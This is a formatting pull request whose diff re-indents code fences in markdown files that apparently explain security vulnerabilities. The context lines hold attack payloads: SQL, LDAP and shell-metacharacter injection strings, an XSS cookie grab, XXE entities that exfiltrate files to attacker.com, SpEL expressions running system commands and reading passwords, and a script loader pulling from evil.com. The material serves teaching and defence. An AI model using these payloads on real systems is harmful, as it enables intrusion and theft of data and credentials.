### PR TITLE
chore(format): fix codeblock formatting

### DIFF
--- a/data/vcorp_007.md
+++ b/data/vcorp_007.md
@@ -202,7 +202,7 @@ int main() {
    ```cpp
    std::string ldapFilter = "(uid=" + userInput + ")";
    
-```
+   ```
 
 2. **LDAP Query Syntax**: LDAP filters use a specific syntax with special characters that have meaning within queries:
    - Parentheses `()` define the scope of filters

--- a/data/vcorp_008.md
+++ b/data/vcorp_008.md
@@ -215,20 +215,20 @@ By injecting these characters, attackers can manipulate the query structure. For
    ```
    (&(objectClass=user)(uid=john))
    
-```
+   ```
 
 2. **Manipulated filter with injection `*)(|(uid=*`:**
    ```
    (&(objectClass=user)(uid=*)(|(uid=*)))
    
-```
+   ```
    This creates a condition that matches any user object.
 
 3. **Filter with information disclosure injection `*)(mail=*)(objectClass=*`:**
    ```
    (&(objectClass=user)(uid=*)(mail=*)(objectClass=*))
    
-```
+   ```
    This pulls additional attributes beyond the intended scope.
 
 The vulnerability is particularly dangerous because:

--- a/data/vcorp_030.md
+++ b/data/vcorp_030.md
@@ -175,7 +175,7 @@ app.listen(3000, () => {
    ```bash
    git log -p --all -S "GENERIC_API_KEY"
    
-```
+   ```
 
 2. **Automated Secret Detection Tools**: Attackers routinely use specialized tools to find secrets in repositories:
    - **GitRob**: Scans organizations for sensitive files
@@ -185,8 +185,7 @@ app.listen(3000, () => {
 3. **GitHub Search**: Simple queries like `"API_KEY"` in GitHub search can reveal hard-coded credentials:
    ```
    "const API_KEY" filename:*.js
-   
-```
+   ```
 
 **Technical issues:**
 

--- a/data/vcorp_032.md
+++ b/data/vcorp_032.md
@@ -171,7 +171,7 @@ The fundamental issues are:
    ```javascript
    jwt.sign({ id: user.id, role: user.role }, config.jwtSecret, ...)
    
-```
+   ```
 
 4. **Usage Pattern**: The authentication module exports a `generateToken` function that other parts of the application likely use to create tokens for authenticated users. This suggests the tokens are used throughout the application for maintaining session state and authorization.
 

--- a/data/vcorp_034.md
+++ b/data/vcorp_034.md
@@ -160,14 +160,12 @@ An attacker injects a payload with multiple SQL statements:
 
 ```
 "userID": "1'; UPDATE users SET is_admin = true WHERE username = 'attacker';--"
-
 ```
 
 If the database driver supports multiple statements, this would execute:
 
 ```sql
 SELECT username, email FROM users WHERE id = '1'; UPDATE users SET is_admin = true WHERE username = 'attacker';--'
-
 ```
 
 The attack grants administrative privileges to the attacker's account, enabling further system compromise.
@@ -177,7 +175,6 @@ An attacker uses error-based techniques to map the database:
 
 ```
 "userID": "' AND (SELECT 1 FROM information_schema.tables WHERE table_schema=database() LIMIT 1)='2"
-
 ```
 
 This causes a type conversion error that reveals database information in error messages. By iterating through similar queries, the attacker builds a complete map of the database schema, tables, and columns to plan more targeted attacks.
@@ -234,21 +231,21 @@ The vulnerability allows an attacker to break out of the intended SQL string con
 1. Normal execution with `userID = "123"` produces:
    ```sql
    SELECT username, email FROM users WHERE id = '123'
-   
-```
+
+   ```
 
 2. Malicious input with `userID = "1' OR '1'='1"` produces:
    ```sql
    SELECT username, email FROM users WHERE id = '1' OR '1'='1'
-   
-```
+
+   ```
    This would return all users rather than just the one with id=1.
 
 3. Data extraction with `userID = "1' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'public';--"` produces:
    ```sql
    SELECT username, email FROM users WHERE id = '1' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'public';--'
    
-```
+   ```
    This returns database metadata, revealing the schema structure.
 
 The Go runtime environment exacerbates this vulnerability because:

--- a/data/vcorp_046.md
+++ b/data/vcorp_046.md
@@ -187,7 +187,7 @@ The following sequence occurs:
    ```html
    <html><body>User input: <script>alert(document.cookie)</script></body></html>
    
-```
+   ```
 
 3. The browser receives this response, parses it as HTML, and executes the injected JavaScript code within the context of the acme-app.com domain.
 

--- a/data/vcorp_052.md
+++ b/data/vcorp_052.md
@@ -159,7 +159,7 @@ The vulnerability stems from two fundamental cryptographic mistakes in the sessi
    // Reseeds on every call using time
    rand.Seed(time.Now().UnixNano())
    
-```
+   ```
 
    This compounds the problem in several ways:
    

--- a/data/vcorp_081.md
+++ b/data/vcorp_081.md
@@ -163,7 +163,7 @@ public class SessionTokenGenerator {
    ```
    next(n) = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1)
    
-```
+   ```
    This algorithm is deterministic and not designed for security purposes.
 
 2. **Predictable sequence**: If an attacker can determine the internal state of the PRNG (which has only 2^48 possible states), they can predict all future outputs.

--- a/data/vcorp_088.md
+++ b/data/vcorp_088.md
@@ -200,26 +200,26 @@ The vulnerability allows for several types of XXE attacks:
    ```xml
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///path/to/sensitive/file"> ]>
    
-```
+   ```
 
 2. **Blind XXE with Data Exfiltration**:
    ```xml
    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe;]>
    
-```
+   ```
    Where malicious.dtd contains:
    ```xml
    <!ENTITY % data SYSTEM "file:///path/to/sensitive/file">
    <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%data;'>">
    %param1;
    
-```
+   ```
 
 3. **XXE for SSRF**:
    ```xml
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-host:port/api"> ]>
    
-```
+   ```
 
 4. **Entity Expansion DoS**:
    Nested entity references causing exponential expansion and resource exhaustion.

--- a/data/vcorp_092.md
+++ b/data/vcorp_092.md
@@ -177,31 +177,31 @@ Attackers can exploit this vulnerability using various SpEL expressions:
    ```
    T(java.lang.System).getProperty('java.class.path')
    
-```
+   ```
 
 2. **Executing System Commands**:
    ```
    T(java.lang.Runtime).getRuntime().exec('cmd /c dir')
    
-```
+   ```
 
 3. **Accessing Application Context**:
    ```
    @applicationContext.getBeanDefinitionNames()
    
-```
+   ```
 
 4. **Reading Application Configuration**:
    ```
    @environment.getProperty('spring.datasource.password')
    
-```
+   ```
 
 5. **Accessing File System**:
    ```
    new java.io.File('/etc/passwd').exists()
    
-```
+   ```
 
 These capabilities effectively give attackers a shell-like interface to the application's internals and the underlying system, representing one of the most severe types of vulnerabilities possible in a Spring application.
 

--- a/data/vcorp_096.md
+++ b/data/vcorp_096.md
@@ -183,25 +183,25 @@ The vulnerability can be exploited by injecting shell metacharacters into the `d
    ```
    normal_input ; malicious_command
    
-```
+   ```
 
 2. **Command substitution**: Using `$()` or backticks
    ```
    normal_input $(malicious_command)
    
-```
+   ```
 
 3. **Logical operators**: Using `&&` or `||`
    ```
    normal_input && malicious_command
    
-```
+   ```
 
 4. **Pipelines**: Using `|` to pipe output
    ```
    normal_input | malicious_command
    
-```
+   ```
 
 **Execution Environment Considerations:**
 

--- a/data/vcorp_099.md
+++ b/data/vcorp_099.md
@@ -159,8 +159,7 @@ if (dynamicCode) {
 3. **Complex attack:**
    ```
    https://acme-corp.com/app?script=var s=document.createElement('script');s.src='https://evil.com/malicious.js';document.body.appendChild(s);
-   
-```
+   ```
    This loads a full external malicious script, allowing for more complex attacks.
 
 **Technical Context:**


### PR DESCRIPTION
This pull request includes minor changes to remove unnecessary blank lines in code examples across multiple files. These changes improve the readability and consistency of the documentation.

### Blank line removals for improved readability:

* [`data/vcorp_030.md`](diffhunk://#diff-b037c08c50b13c24ea6db95ab86e63fb739190fe2dd9add22386d4607eeeaeb1L188): Removed an unnecessary blank line in the example query for detecting hard-coded credentials.
* [`data/vcorp_034.md`](diffhunk://#diff-161c37e4c4e2bd40a9fb8eb19a3ff89418dbf2a957ab00b3fc6687ad8164112aL163-L170): Removed unnecessary blank lines in examples showcasing SQL injection techniques, including payload injection and error-based database mapping. [[1]](diffhunk://#diff-161c37e4c4e2bd40a9fb8eb19a3ff89418dbf2a957ab00b3fc6687ad8164112aL163-L170) [[2]](diffhunk://#diff-161c37e4c4e2bd40a9fb8eb19a3ff89418dbf2a957ab00b3fc6687ad8164112aL180)
* [`data/vcorp_099.md`](diffhunk://#diff-5912ea96591419a099092a837e486296b4bd639b2d3ab98e2854ffe8e78f062aL162): Removed an unnecessary blank line in the example URL for a complex attack involving external malicious scripts.